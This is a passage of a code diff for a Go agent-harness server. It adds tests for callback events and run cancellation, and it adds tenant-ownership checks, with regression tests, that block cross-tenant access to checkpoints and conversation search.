+		t.Errorf("callback.scheduled conversation_id = %q, want %q", conv, created.RunID)
+	}
+	if state, _ := got.Payload["state"].(string); state != string(htools.CallbackStatePending) {
+		t.Errorf("callback.scheduled state = %q, want %q", state, htools.CallbackStatePending)
+	}
+	if p, _ := got.Payload["prompt"].(string); p != callbackPrompt {
+		t.Errorf("callback.scheduled prompt = %q, want %q", p, callbackPrompt)
+	}
+	if id, _ := got.Payload["callback_id"].(string); id == "" {
+		t.Error("callback.scheduled payload missing non-empty callback_id")
+	}
+	if delay, _ := got.Payload["delay"].(string); delay != "30s" {
+		t.Errorf("callback.scheduled delay = %q, want %q", delay, "30s")
+	}
+}
+
+// readForCallbackScheduled opens GET /v1/runs/{id}/events and reads SSE frames
+// until it sees a callback.scheduled event (returned) or a terminal run event /
+// timeout (fatal). It returns the parsed callback.scheduled frame.
+func readForCallbackScheduled(t *testing.T, baseURL, runID string) sseCallbackEvent {
+	t.Helper()
+
+	ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
+	defer cancel()
+
+	req, err := http.NewRequestWithContext(ctx, http.MethodGet, baseURL+"/v1/runs/"+runID+"/events", nil)
+	if err != nil {
+		t.Fatalf("build events request: %v", err)
+	}
+	resp, err := http.DefaultClient.Do(req)
+	if err != nil {
+		t.Fatalf("open events stream: %v", err)
+	}
+	defer resp.Body.Close()
+	if resp.StatusCode != http.StatusOK {
+		t.Fatalf("events stream: expected 200, got %d", resp.StatusCode)
+	}
+
+	scanner := bufio.NewScanner(resp.Body)
+	scanner.Buffer(make([]byte, 0, 64*1024), 1<<20)
+
+	var sawTerminal bool
+	for scanner.Scan() {
+		line := scanner.Text()
+		data, ok := strings.CutPrefix(line, "data: ")
+		if !ok {
+			continue
+		}
+		var ev sseCallbackEvent
+		if err := json.Unmarshal([]byte(data), &ev); err != nil {
+			// Non-event data line (e.g. keepalive comment handled above); skip.
+			continue
+		}
+		switch ev.Type {
+		case string(harness.EventCallbackScheduled):
+			return ev
+		case string(harness.EventRunCompleted), string(harness.EventRunFailed), string(harness.EventRunCancelled):
+			// The stream closes on a terminal event. Record it; if we exit the
+			// loop without having seen callback.scheduled, fail with context.
+			sawTerminal = true
+		}
+	}
+	if err := scanner.Err(); err != nil && ctx.Err() == nil {
+		t.Fatalf("scan events stream: %v", err)
+	}
+
+	if sawTerminal {
+		t.Fatal("run stream reached a terminal event without emitting callback.scheduled")
+	}
+	t.Fatal("timed out waiting for callback.scheduled on the run SSE stream")
+	return sseCallbackEvent{} // unreachable
+}

--- a/internal/server/http_cancel_provider_test.go
+++ b/internal/server/http_cancel_provider_test.go
@@ -1,0 +1,252 @@
+package server
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"io"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+	"time"
+
+	"go-agent-harness/internal/fakeprovider"
+	"go-agent-harness/internal/harness"
+)
+
+// TestCancelProvider verifies mid-flight cancellation of an in-flight provider
+// Complete() call through the HTTP API.
+func TestCancelProvider(t *testing.T) {
+	t.Parallel()
+
+	// Create a fakeprovider with a single Hang turn so Complete blocks on ctx
+	// until cancelled.
+	prov := fakeprovider.New(
+		[]fakeprovider.Turn{
+			{Hang: true},
+		},
+	)
+
+	// Create runner and HTTP server
+	runner := harness.NewRunner(prov, harness.NewRegistry(), harness.RunnerConfig{
+		DefaultModel: "test-model",
+		MaxSteps:     5,
+	})
+
+	handler := New(runner)
+	ts := httptest.NewServer(handler)
+	defer ts.Close()
+	defer runner.Shutdown(context.Background())
+
+	// Start a run
+	res, err := http.Post(ts.URL+"/v1/runs", "application/json",
+		bytes.NewBufferString(`{"prompt":"hello"}`))
+	if err != nil {
+		t.Fatalf("start run: %v", err)
+	}
+	defer res.Body.Close()
+
+	var created struct {
+		RunID string `json:"run_id"`
+	}
+	if err := json.NewDecoder(res.Body).Decode(&created); err != nil {
+		t.Fatalf("decode response: %v", err)
+	}
+
+	// Wait for the provider to be in-flight (poll until prov.Calls() == 1)
+	deadline := time.Now().Add(3 * time.Second)
+	for time.Now().Before(deadline) {
+		if prov.Calls() >= 1 {
+			break
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+	if prov.Calls() < 1 {
+		t.Fatal("provider never started; prov.Calls() < 1")
+	}
+
+	// POST /cancel
+	cancelRes, err := http.Post(
+		ts.URL+"/v1/runs/"+created.RunID+"/cancel",
+		"application/json",
+		nil,
+	)
+	if err != nil {
+		t.Fatalf("cancel request: %v", err)
+	}
+	defer cancelRes.Body.Close()
+
+	if cancelRes.StatusCode != http.StatusOK {
+		body, _ := io.ReadAll(cancelRes.Body)
+		t.Fatalf("expected cancel 200, got %d: %s", cancelRes.StatusCode, string(body))
+	}
+
+	// Verify the run terminates with status "cancelled" within a bounded deadline
+	deadline = time.Now().Add(3 * time.Second)
+	for time.Now().Before(deadline) {
+		checkRes, err := http.Get(ts.URL + "/v1/runs/" + created.RunID)
+		if err != nil {
+			time.Sleep(10 * time.Millisecond)
+			continue
+		}
+
+		var runState struct {
+			Status string `json:"status"`
+		}
+		if err := json.NewDecoder(checkRes.Body).Decode(&runState); err != nil {
+			checkRes.Body.Close()
+			time.Sleep(10 * time.Millisecond)
+			continue
+		}
+		checkRes.Body.Close()
+
+		if runState.Status == "cancelled" {
+			// Success!
+			prov.Release()
+			return
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+
+	// Final check
+	checkRes, _ := http.Get(ts.URL + "/v1/runs/" + created.RunID)
+	if checkRes != nil {
+		var runState struct {
+			Status string `json:"status"`
+		}
+		json.NewDecoder(checkRes.Body).Decode(&runState)
+		checkRes.Body.Close()
+		if runState.Status != "cancelled" {
+			t.Errorf("expected status 'cancelled', got %q", runState.Status)
+		}
+	} else {
+		t.Fatal("final status check failed")
+	}
+
+	prov.Release()
+}
+
+// TestCancelProvider_Events verifies that the run.cancelled event appears
+// and run.completed does not when a provider is cancelled mid-flight.
+func TestCancelProvider_Events(t *testing.T) {
+	t.Parallel()
+
+	// Create a fakeprovider with a single Hang turn
+	prov := fakeprovider.New(
+		[]fakeprovider.Turn{
+			{Hang: true},
+		},
+	)
+
+	// Create runner and HTTP server
+	runner := harness.NewRunner(prov, harness.NewRegistry(), harness.RunnerConfig{
+		DefaultModel: "test-model",
+		MaxSteps:     5,
+	})
+
+	handler := New(runner)
+	ts := httptest.NewServer(handler)
+	defer ts.Close()
+	defer runner.Shutdown(context.Background())
+
+	// Start a run
+	res, err := http.Post(ts.URL+"/v1/runs", "application/json",
+		bytes.NewBufferString(`{"prompt":"hello"}`))
+	if err != nil {
+		t.Fatalf("start run: %v", err)
+	}
+	defer res.Body.Close()
+
+	var created struct {
+		RunID string `json:"run_id"`
+	}
+	if err := json.NewDecoder(res.Body).Decode(&created); err != nil {
+		t.Fatalf("decode response: %v", err)
+	}
+
+	// Wait for the provider to be genuinely in-flight (prov.Calls() == 1).
+	// This mirrors TestCancelProvider and proves the cancel is mid-flight, not
+	// a race where we cancel before the provider has been reached.
+	deadline := time.Now().Add(3 * time.Second)
+	for time.Now().Before(deadline) {
+		if prov.Calls() >= 1 {
+			break
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+	if prov.Calls() < 1 {
+		t.Fatal("provider never went in-flight; prov.Calls() < 1 after 3s deadline")
+	}
+
+	// Subscribe to events in a goroutine
+	eventsChan := make(chan string, 100)
+	go func() {
+		ctx, cancel := context.WithTimeout(context.Background(), 4*time.Second)
+		defer cancel()
+
+		req, _ := http.NewRequestWithContext(ctx, "GET", ts.URL+"/v1/runs/"+created.RunID+"/events", nil)
+		resp, err := http.DefaultClient.Do(req)
+		if err != nil {
+			close(eventsChan)
+			return
+		}
+		defer resp.Body.Close()
+
+		body, _ := io.ReadAll(resp.Body)
+		eventsChan <- string(body)
+		close(eventsChan)
+	}()
+
+	// Cancel the run
+	cancelRes, err := http.Post(
+		ts.URL+"/v1/runs/"+created.RunID+"/cancel",
+		"application/json",
+		nil,
+	)
+	if err != nil {
+		t.Fatalf("cancel request: %v", err)
+	}
+	cancelRes.Body.Close()
+
+	// Wait for events
+	var eventBody string
+	select {
+	case eb := <-eventsChan:
+		eventBody = eb
+	case <-time.After(5 * time.Second):
+		t.Fatal("timeout waiting for events")
+	}
+
+	// Assert run.cancelled appears
+	if eventBody == "" {
+		t.Fatal("no events received")
+	}
+	if !bytes.Contains([]byte(eventBody), []byte("run.cancelled")) {
+		t.Errorf("expected 'run.cancelled' event in stream:\n%s", eventBody)
+	}
+
+	// Assert run.completed does NOT appear
+	if bytes.Contains([]byte(eventBody), []byte("run.completed")) {
+		t.Errorf("expected NO 'run.completed' event when cancelled, got:\n%s", eventBody)
+	}
+
+	// Independently confirm the run's final API status via GET /v1/runs/{id}.
+	// This verifies that the server's persisted state matches the SSE events and
+	// that the test stands alone without relying solely on the event stream.
+	statusRes, err := http.Get(ts.URL + "/v1/runs/" + created.RunID)
+	if err != nil {
+		t.Fatalf("GET /v1/runs/%s: %v", created.RunID, err)
+	}
+	defer statusRes.Body.Close()
+	var finalState struct {
+		Status string `json:"status"`
+	}
+	if err := json.NewDecoder(statusRes.Body).Decode(&finalState); err != nil {
+		t.Fatalf("decode run status: %v", err)
+	}
+	if finalState.Status != "cancelled" {
+		t.Errorf("GET /v1/runs/%s: expected status %q, got %q", created.RunID, "cancelled", finalState.Status)
+	}
+
+	prov.Release()
+}

--- a/internal/server/http_cancel_scope_test.go
+++ b/internal/server/http_cancel_scope_test.go
@@ -74,7 +74,11 @@ func TestScope_ReadOnly_CannotCancelRun(t *testing.T) {
 		Store:  ms,
 	})
 
-	run, err := runner.StartRun(harness.RunRequest{Prompt: "hello"})
+	// Stamp the run with the same tenant the API keys belong to. This test
+	// exercises scope enforcement (read-only vs write), not tenant isolation;
+	// without a matching tenant the by-ID tenant-ownership gate would 404 the
+	// write key's cancel before scope even mattered.
+	run, err := runner.StartRun(harness.RunRequest{Prompt: "hello", TenantID: "tenant-cancel-scope"})
 	if err != nil {
 		t.Fatalf("StartRun: %v", err)
 	}

--- a/internal/server/http_checkpoint_tenant_test.go
+++ b/internal/server/http_checkpoint_tenant_test.go
@@ -1,0 +1,243 @@
+package server_test
+
+import (
+	"bytes"
+	"context"
+	"io"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+	"time"
+
+	"go-agent-harness/internal/checkpoints"
+	"go-agent-harness/internal/fakeprovider"
+	"go-agent-harness/internal/harness"
+	"go-agent-harness/internal/server"
+	"go-agent-harness/internal/store"
+)
+
+// checkpointTenantFixture wires a server with auth enabled, two tenants, a run
+// store, and a checkpoint service. A checkpoint created for a run belonging to
+// tenant A must be invisible and unresumable by tenant B (GAP-2).
+type checkpointTenantFixture struct {
+	ts           *httptest.Server
+	tokenA       string
+	tokenB       string
+	checkpointID string
+}
+
+func newCheckpointTenantFixture(t *testing.T) *checkpointTenantFixture {
+	t.Helper()
+
+	ms := store.NewMemoryStore()
+
+	tenantA := "tenant-alpha"
+	tokenA, keyA := generateFastAPIKey(t, tenantA, "key A", []string{
+		store.ScopeRunsRead,
+		store.ScopeRunsWrite,
+	})
+	if err := ms.CreateAPIKey(context.Background(), keyA); err != nil {
+		t.Fatalf("CreateAPIKey A: %v", err)
+	}
+
+	tenantB := "tenant-bravo"
+	tokenB, keyB := generateFastAPIKey(t, tenantB, "key B", []string{
+		store.ScopeRunsRead,
+		store.ScopeRunsWrite,
+	})
+	if err := ms.CreateAPIKey(context.Background(), keyB); err != nil {
+		t.Fatalf("CreateAPIKey B: %v", err)
+	}
+
+	// Persist a run owned by tenant A directly into the store (no live runner
+	// involvement needed — we only need the tenant ownership record).
+	runA := &store.Run{
+		ID:       "run-tenant-alpha-001",
+		TenantID: tenantA,
+		Status:   store.RunStatusCompleted,
+	}
+	if err := ms.CreateRun(context.Background(), runA); err != nil {
+		t.Fatalf("CreateRun: %v", err)
+	}
+
+	// Create a checkpoint service and a checkpoint that references tenant A's run.
+	now := time.Now
+	cpStore := checkpoints.NewMemoryStore()
+	checkpointSvc := checkpoints.NewService(cpStore, now)
+	cp, err := checkpointSvc.Create(context.Background(), checkpoints.CreateRequest{
+		Kind:  checkpoints.KindExternalResume,
+		RunID: runA.ID,
+	})
+	if err != nil {
+		t.Fatalf("checkpoints.Create: %v", err)
+	}
+
+	runner := harness.NewRunner(
+		fakeprovider.New(nil),
+		harness.NewRegistry(),
+		harness.RunnerConfig{
+			DefaultModel: "test-model",
+			Store:        ms,
+		},
+	)
+
+	h := server.NewWithOptions(server.ServerOptions{
+		Store:       ms,
+		Runner:      runner,
+		Checkpoints: checkpointSvc,
+		// AuthDisabled NOT set — auth is enabled.
+	})
+	ts := httptest.NewServer(h)
+	t.Cleanup(func() {
+		ts.Close()
+		runner.Shutdown(context.Background())
+	})
+
+	return &checkpointTenantFixture{
+		ts:           ts,
+		tokenA:       tokenA,
+		tokenB:       tokenB,
+		checkpointID: cp.ID,
+	}
+}
+
+func (f *checkpointTenantFixture) doCheckpoint(t *testing.T, method, token, path string, body []byte) (int, string) {
+	t.Helper()
+	var req *http.Request
+	if body != nil {
+		req, _ = http.NewRequest(method, f.ts.URL+path, bytes.NewReader(body))
+		req.Header.Set("Content-Type", "application/json")
+	} else {
+		req, _ = http.NewRequest(method, f.ts.URL+path, nil)
+	}
+	req.Header.Set("Authorization", "Bearer "+token)
+	resp, err := http.DefaultClient.Do(req)
+	if err != nil {
+		t.Fatalf("%s %s: %v", method, path, err)
+	}
+	defer resp.Body.Close()
+	b, _ := io.ReadAll(resp.Body)
+	return resp.StatusCode, string(b)
+}
+
+// TestTenantIsolation_Checkpoint_UnresolvableRunFailsClosed proves that a
+// checkpoint whose RunID references a run that exists in neither the in-memory
+// runner state nor the persistent store is NOT served to an authenticated
+// (non-default) tenant. This is the fail-closed path: when tenant ownership
+// cannot be resolved, access is denied rather than granted.
+func TestTenantIsolation_Checkpoint_UnresolvableRunFailsClosed(t *testing.T) {
+	t.Parallel()
+
+	ms := store.NewMemoryStore()
+
+	tenantA := "tenant-alpha-unresolvable"
+	tokenA, keyA := generateFastAPIKey(t, tenantA, "key A unresolvable", []string{
+		store.ScopeRunsRead,
+		store.ScopeRunsWrite,
+	})
+	if err := ms.CreateAPIKey(context.Background(), keyA); err != nil {
+		t.Fatalf("CreateAPIKey A: %v", err)
+	}
+
+	// Create a checkpoint that references a run ID that does NOT exist in the
+	// store or in-memory runner state. This simulates a run that was purged or
+	// never recorded. The gate must fail CLOSED for the authenticated caller.
+	now := time.Now
+	cpStore := checkpoints.NewMemoryStore()
+	checkpointSvc := checkpoints.NewService(cpStore, now)
+	cp, err := checkpointSvc.Create(context.Background(), checkpoints.CreateRequest{
+		Kind:  checkpoints.KindExternalResume,
+		RunID: "run-that-does-not-exist-anywhere",
+	})
+	if err != nil {
+		t.Fatalf("checkpoints.Create: %v", err)
+	}
+
+	runner := harness.NewRunner(
+		fakeprovider.New(nil),
+		harness.NewRegistry(),
+		harness.RunnerConfig{
+			DefaultModel: "test-model",
+			Store:        ms,
+		},
+	)
+
+	h := server.NewWithOptions(server.ServerOptions{
+		Store:       ms,
+		Runner:      runner,
+		Checkpoints: checkpointSvc,
+		// AuthDisabled NOT set — auth is enabled.
+	})
+	ts := httptest.NewServer(h)
+	t.Cleanup(func() {
+		ts.Close()
+		runner.Shutdown(context.Background())
+	})
+
+	cpPath := "/v1/checkpoints/" + cp.ID
+
+	doReq := func(method, token, path string, body []byte) (int, string) {
+		t.Helper()
+		var req *http.Request
+		if body != nil {
+			req, _ = http.NewRequest(method, ts.URL+path, bytes.NewReader(body))
+			req.Header.Set("Content-Type", "application/json")
+		} else {
+			req, _ = http.NewRequest(method, ts.URL+path, nil)
+		}
+		req.Header.Set("Authorization", "Bearer "+token)
+		resp, err := http.DefaultClient.Do(req)
+		if err != nil {
+			t.Fatalf("%s %s: %v", method, path, err)
+		}
+		defer resp.Body.Close()
+		b, _ := io.ReadAll(resp.Body)
+		return resp.StatusCode, string(b)
+	}
+
+	// GET: authenticated tenant must NOT be able to read a checkpoint whose run
+	// cannot be resolved — fail closed → 404.
+	if code, body := doReq(http.MethodGet, tokenA, cpPath, nil); code != http.StatusNotFound {
+		t.Errorf("GET checkpoint with unresolvable run: got %d (body: %s), want 404 — fail-closed required", code, body)
+	}
+
+	// POST /resume: same gate must apply to mutation.
+	if code, body := doReq(http.MethodPost, tokenA, cpPath+"/resume",
+		[]byte(`{"payload":{}}`)); code != http.StatusNotFound {
+		t.Errorf("POST checkpoint/resume with unresolvable run: got %d (body: %s), want 404 — fail-closed required", code, body)
+	}
+}
+
+// TestTenantIsolation_Checkpoint_CrossTenantDenied (GAP-2):
+// GET /v1/checkpoints/{id} and POST /v1/checkpoints/{id}/resume enforce scope
+// but NOT tenant ownership. Tenant B currently reads/resumes a checkpoint
+// created by tenant A's run (BUG). After the fix, both must return 404.
+func TestTenantIsolation_Checkpoint_CrossTenantDenied(t *testing.T) {
+	t.Parallel()
+
+	f := newCheckpointTenantFixture(t)
+	cpPath := "/v1/checkpoints/" + f.checkpointID
+
+	// Sanity: tenant A can read their own checkpoint.
+	if code, body := f.doCheckpoint(t, http.MethodGet, f.tokenA, cpPath, nil); code != http.StatusOK {
+		t.Errorf("tenant A GET checkpoint: got %d, want 200; body %s", code, body)
+	}
+
+	// GAP-2 regression: tenant B must NOT be able to read tenant A's checkpoint.
+	// Currently returns 200 (BUG — no tenant ownership check in http_checkpoints.go).
+	if code, body := f.doCheckpoint(t, http.MethodGet, f.tokenB, cpPath, nil); code != http.StatusNotFound {
+		t.Errorf("tenant B GET checkpoint: got %d (body: %s), want 404 — checkpoint tenant ownership not enforced", code, body)
+	}
+
+	// GAP-2 regression: tenant B must NOT be able to resume tenant A's checkpoint.
+	if code, body := f.doCheckpoint(t, http.MethodPost, f.tokenB, cpPath+"/resume",
+		[]byte(`{"payload":{}}`)); code != http.StatusNotFound {
+		t.Errorf("tenant B POST checkpoint/resume: got %d (body: %s), want 404 — checkpoint tenant ownership not enforced", code, body)
+	}
+
+	// Tenant A's resume should still work (owner access must be preserved).
+	if code, body := f.doCheckpoint(t, http.MethodPost, f.tokenA, cpPath+"/resume",
+		[]byte(`{"payload":{"decision":"ok"}}`)); code != http.StatusOK {
+		t.Errorf("tenant A POST checkpoint/resume: got %d, want 200; body %s", code, body)
+	}
+}

--- a/internal/server/http_checkpoints.go
+++ b/internal/server/http_checkpoints.go
@@ -11,6 +11,52 @@ import (
 	"go-agent-harness/internal/store"
 )
 
+// checkpointTenantMismatch reports whether the checkpoint identified by
+// checkpointID belongs to a tenant other than the caller's.
+//
+// It resolves the checkpoint's owning tenant via its RunID: the run's TenantID
+// is compared to the caller's authenticated tenant. Resolution order mirrors
+// runTenantMismatch: in-memory runner state first, then the persistent store.
+//
+//   - Auth disabled or no runStore → never gates (returns false).
+//   - Checkpoint's RunID is empty (e.g. workflow-only checkpoints) → no run to
+//     resolve from; do not gate (treat as unknown ownership).
+//   - Run found and its tenant differs from the caller → gate (returns true).
+//   - Run not found in either source, caller tenant non-empty → fail CLOSED
+//     (return true): a checkpoint that references a run whose tenant cannot be
+//     resolved must not be served to an authenticated tenant. This prevents a
+//     deleted/missing run from silently becoming a cross-tenant gate bypass.
+//   - Run not found, caller tenant empty (auth-disabled path) → do not gate.
+func (s *Server) checkpointTenantMismatch(r *http.Request, record checkpoints.Record) bool {
+	if s.authDisabled || s.runStore == nil {
+		return false
+	}
+	if record.RunID == "" {
+		// No run linkage: cannot enforce ownership. Do not gate.
+		return false
+	}
+	caller := normalizeTenant(TenantIDFromContext(r.Context()))
+
+	// In-memory state first: covers active and recently completed runs.
+	if s.runner != nil {
+		if run, ok := s.runner.GetRun(record.RunID); ok {
+			return normalizeTenant(run.TenantID) != caller
+		}
+	}
+
+	// Fall back to the persistent store for historical runs.
+	storeRun, err := s.runStore.GetRun(r.Context(), record.RunID)
+	if err == nil && storeRun != nil {
+		return normalizeTenant(storeRun.TenantID) != caller
+	}
+
+	// Run not found in either source. When an authenticated (non-empty) tenant
+	// is making the request, fail CLOSED: a checkpoint whose owning run cannot
+	// be resolved must not be served. An empty caller tenant (normalized to
+	// "default") means auth is effectively disabled for this request; do not gate.
+	return caller != "default"
+}
+
 type checkpointManager interface {
 	Get(ctx context.Context, id string) (checkpoints.Record, error)
 	Resume(ctx context.Context, id string, payload map[string]any) error
@@ -70,6 +116,12 @@ func (s *Server) handleGetCheckpoint(w http.ResponseWriter, r *http.Request, che
 		writeError(w, http.StatusInternalServerError, "internal_error", err.Error())
 		return
 	}
+	// Enforce tenant ownership: a checkpoint's tenant is resolved via its RunID.
+	// Cross-tenant access returns 404 (matching the unknown-id contract).
+	if s.checkpointTenantMismatch(r, record) {
+		writeError(w, http.StatusNotFound, "not_found", fmt.Sprintf("checkpoint %q not found", checkpointID))
+		return
+	}
 	writeJSON(w, http.StatusOK, record)
 }
 
@@ -88,6 +140,23 @@ func (s *Server) handleResumeCheckpoint(w http.ResponseWriter, r *http.Request, 
 	}
 	if req.Payload == nil {
 		req.Payload = map[string]any{}
+	}
+
+	// Enforce tenant ownership before mutating: resolve the checkpoint's tenant
+	// via its RunID. Cross-tenant access returns 404 (matching the unknown-id
+	// contract so the existence of another tenant's checkpoint is never revealed).
+	existing, err := s.checkpoints.Get(r.Context(), checkpointID)
+	if err != nil {
+		if checkpoints.IsNotFound(err) {
+			writeError(w, http.StatusNotFound, "not_found", fmt.Sprintf("checkpoint %q not found", checkpointID))
+			return
+		}
+		writeError(w, http.StatusInternalServerError, "internal_error", err.Error())
+		return
+	}
+	if s.checkpointTenantMismatch(r, existing) {
+		writeError(w, http.StatusNotFound, "not_found", fmt.Sprintf("checkpoint %q not found", checkpointID))
+		return
 	}
 
 	if err := s.checkpoints.Resume(r.Context(), checkpointID, req.Payload); err != nil {

--- a/internal/server/http_conversations.go
+++ b/internal/server/http_conversations.go
@@ -46,6 +46,9 @@ func (s *Server) handleConversations(w http.ResponseWriter, r *http.Request) {
 			writeScopeError(w, store.ScopeRunsWrite)
 			return
 		}
+		if s.blockConversationCrossTenant(w, r, parts[0]) {
+			return
+		}
 		s.handleDeleteConversation(w, r, parts[0])
 		return
 	}
@@ -61,6 +64,9 @@ func (s *Server) handleConversations(w http.ResponseWriter, r *http.Request) {
 			return
 		}
 		convID := parts[0]
+		if s.blockConversationCrossTenant(w, r, convID) {
+			return
+		}
 		msgs, ok := s.runner.ConversationMessages(convID)
 		if !ok {
 			writeError(w, http.StatusNotFound, "not_found", fmt.Sprintf("conversation %q not found", convID))
@@ -94,6 +100,9 @@ func (s *Server) handleConversations(w http.ResponseWriter, r *http.Request) {
 			writeScopeError(w, store.ScopeRunsRead)
 			return
 		}
+		if s.blockConversationCrossTenant(w, r, parts[0]) {
+			return
+		}
 		s.handleExportConversation(w, r, parts[0])
 		return
 	}
@@ -106,6 +115,9 @@ func (s *Server) handleConversations(w http.ResponseWriter, r *http.Request) {
 		}
 		if !hasScope(r.Context(), store.ScopeRunsWrite) {
 			writeScopeError(w, store.ScopeRunsWrite)
+			return
+		}
+		if s.blockConversationCrossTenant(w, r, parts[0]) {
 			return
 		}
 		s.handleCompactConversation(w, r, parts[0])
@@ -146,6 +158,31 @@ func (s *Server) handleSearchConversations(w http.ResponseWriter, r *http.Reques
 		return
 	}
 
+	// Enforce tenant isolation: full-text search must only return the caller's own
+	// messages. effectiveTenantID resolves the authenticated tenant (and rejects a
+	// conflicting ?tenant_id=). When auth is disabled it returns the request value
+	// (empty by default), which disables the filter and preserves prior behavior.
+	//
+	// Tenant consistency note: conversations are stored with the LITERAL tenant ID
+	// from the run (runner.go normalises "default" → "" before writing to the
+	// store, so the default/no-tenant case is stored as ""). effectiveTenantID
+	// likewise returns "" for auth-disabled requests, causing SearchMessages to
+	// skip the tenant filter entirely — which is the correct legacy behaviour.
+	// Named tenants (e.g. "tenant-foo") are stored and queried as the same literal
+	// string, so stamping and querying are self-consistent for all named tenants.
+	//
+	// This differs from run-ownership resolution (http_runs.go runTenantMismatch),
+	// which normalises "" → "default" for comparison. The asymmetry is intentional:
+	// conversation rows use "" as the no-tenant sentinel (matching the DB default),
+	// while run records keep "default" as an explicit value. There is no case where
+	// a named tenant's own conversations are hidden from that tenant.
+	requestTenantID := strings.TrimSpace(r.URL.Query().Get("tenant_id"))
+	effectiveTenant, err := s.effectiveTenantID(r, requestTenantID)
+	if err != nil {
+		writeError(w, http.StatusBadRequest, "invalid_request", err.Error())
+		return
+	}
+
 	limit := 20
 	if v := r.URL.Query().Get("limit"); v != "" {
 		if n, err := parsePositiveInt(v); err == nil {
@@ -153,7 +190,7 @@ func (s *Server) handleSearchConversations(w http.ResponseWriter, r *http.Reques
 		}
 	}
 
-	results, err := store.SearchMessages(r.Context(), q, limit)
+	results, err := store.SearchMessages(r.Context(), effectiveTenant, q, limit)
 	if err != nil {
 		writeError(w, http.StatusInternalServerError, "internal_error", err.Error())
 		return

--- a/internal/server/http_conversations_search_tenant_test.go
+++ b/internal/server/http_conversations_search_tenant_test.go
@@ -1,0 +1,166 @@
+package server_test
+
+import (
+	"context"
+	"encoding/json"
+	"io"
+	"net/http"
+	"net/http/httptest"
+	"path/filepath"
+	"testing"
+
+	"go-agent-harness/internal/fakeprovider"
+	"go-agent-harness/internal/harness"
+	"go-agent-harness/internal/server"
+	"go-agent-harness/internal/store"
+)
+
+// searchTenantFixture wires a server with auth enabled (two tenants) AND a
+// SQLite conversation store pre-populated with conversations owned by each
+// tenant. Full-text search must never return one tenant's messages to another.
+type searchTenantFixture struct {
+	ts      *httptest.Server
+	tokenA  string
+	tenantA string
+	tokenB  string
+	tenantB string
+}
+
+func newSearchTenantFixture(t *testing.T) *searchTenantFixture {
+	t.Helper()
+
+	ms := store.NewMemoryStore()
+
+	tenantA := "tenant-alpha"
+	tokenA, keyA := generateFastAPIKey(t, tenantA, "key A", []string{
+		store.ScopeRunsRead,
+		store.ScopeRunsWrite,
+	})
+	if err := ms.CreateAPIKey(context.Background(), keyA); err != nil {
+		t.Fatalf("CreateAPIKey A: %v", err)
+	}
+
+	tenantB := "tenant-bravo"
+	tokenB, keyB := generateFastAPIKey(t, tenantB, "key B", []string{
+		store.ScopeRunsRead,
+		store.ScopeRunsWrite,
+	})
+	if err := ms.CreateAPIKey(context.Background(), keyB); err != nil {
+		t.Fatalf("CreateAPIKey B: %v", err)
+	}
+
+	// SQLite conversation store with one conversation per tenant.
+	path := filepath.Join(t.TempDir(), "search-tenant.db")
+	cs, err := harness.NewSQLiteConversationStore(path)
+	if err != nil {
+		t.Fatalf("NewSQLiteConversationStore: %v", err)
+	}
+	if err := cs.Migrate(context.Background()); err != nil {
+		t.Fatalf("Migrate: %v", err)
+	}
+	t.Cleanup(func() { _ = cs.Close() })
+
+	ctx := context.Background()
+	// Tenant A's conversation contains a unique secret token.
+	if err := cs.SaveConversation(ctx, "conv-A", []harness.Message{
+		{Role: "user", Content: "the magic word is zxqwoplmnbsecret"},
+		{Role: "assistant", Content: "noted zxqwoplmnbsecret"},
+	}); err != nil {
+		t.Fatalf("SaveConversation A: %v", err)
+	}
+	if err := cs.UpdateConversationMeta(ctx, "conv-A", "", tenantA); err != nil {
+		t.Fatalf("UpdateConversationMeta A: %v", err)
+	}
+
+	// Tenant B's conversation mentions a different word.
+	if err := cs.SaveConversation(ctx, "conv-B", []harness.Message{
+		{Role: "user", Content: "bravo only knows pineapple"},
+	}); err != nil {
+		t.Fatalf("SaveConversation B: %v", err)
+	}
+	if err := cs.UpdateConversationMeta(ctx, "conv-B", "", tenantB); err != nil {
+		t.Fatalf("UpdateConversationMeta B: %v", err)
+	}
+
+	runner := harness.NewRunner(
+		fakeprovider.New(nil),
+		harness.NewRegistry(),
+		harness.RunnerConfig{
+			DefaultModel:      "test-model",
+			Store:             ms,
+			ConversationStore: cs,
+		},
+	)
+
+	h := server.NewWithOptions(server.ServerOptions{
+		Store:  ms,
+		Runner: runner,
+		// AuthDisabled NOT set -- auth is enabled.
+	})
+	ts := httptest.NewServer(h)
+	t.Cleanup(func() {
+		ts.Close()
+		runner.Shutdown(context.Background())
+	})
+
+	return &searchTenantFixture{
+		ts:      ts,
+		tokenA:  tokenA,
+		tenantA: tenantA,
+		tokenB:  tokenB,
+		tenantB: tenantB,
+	}
+}
+
+func (f *searchTenantFixture) search(t *testing.T, token, path string) []harness.MessageSearchResult {
+	t.Helper()
+	req, _ := http.NewRequest(http.MethodGet, f.ts.URL+path, nil)
+	req.Header.Set("Authorization", "Bearer "+token)
+	resp, err := http.DefaultClient.Do(req)
+	if err != nil {
+		t.Fatalf("GET %s: %v", path, err)
+	}
+	defer resp.Body.Close()
+	body, _ := io.ReadAll(resp.Body)
+	if resp.StatusCode != http.StatusOK {
+		t.Fatalf("GET %s: status %d, body %s", path, resp.StatusCode, body)
+	}
+	var out struct {
+		Results []harness.MessageSearchResult `json:"results"`
+	}
+	if err := json.Unmarshal(body, &out); err != nil {
+		t.Fatalf("decode search response: %v (%s)", err, body)
+	}
+	return out.Results
+}
+
+// TestTenantIsolation_Search_CrossTenantDenied (fixup-search): tenant B's
+// full-text search must never surface tenant A's messages, via either the
+// dedicated /search route or the ?q= delegation on the list route.
+func TestTenantIsolation_Search_CrossTenantDenied(t *testing.T) {
+	t.Parallel()
+
+	f := newSearchTenantFixture(t)
+
+	// Sanity: tenant A finds their own secret.
+	if got := f.search(t, f.tokenA, "/v1/conversations/search?q=zxqwoplmnbsecret"); len(got) == 0 {
+		t.Fatal("tenant A should find their own message containing the secret")
+	}
+
+	// Tenant B searches for tenant A's secret -> must get ZERO results.
+	for _, path := range []string{
+		"/v1/conversations/search?q=zxqwoplmnbsecret",
+		"/v1/conversations/?q=zxqwoplmnbsecret",
+	} {
+		got := f.search(t, f.tokenB, path)
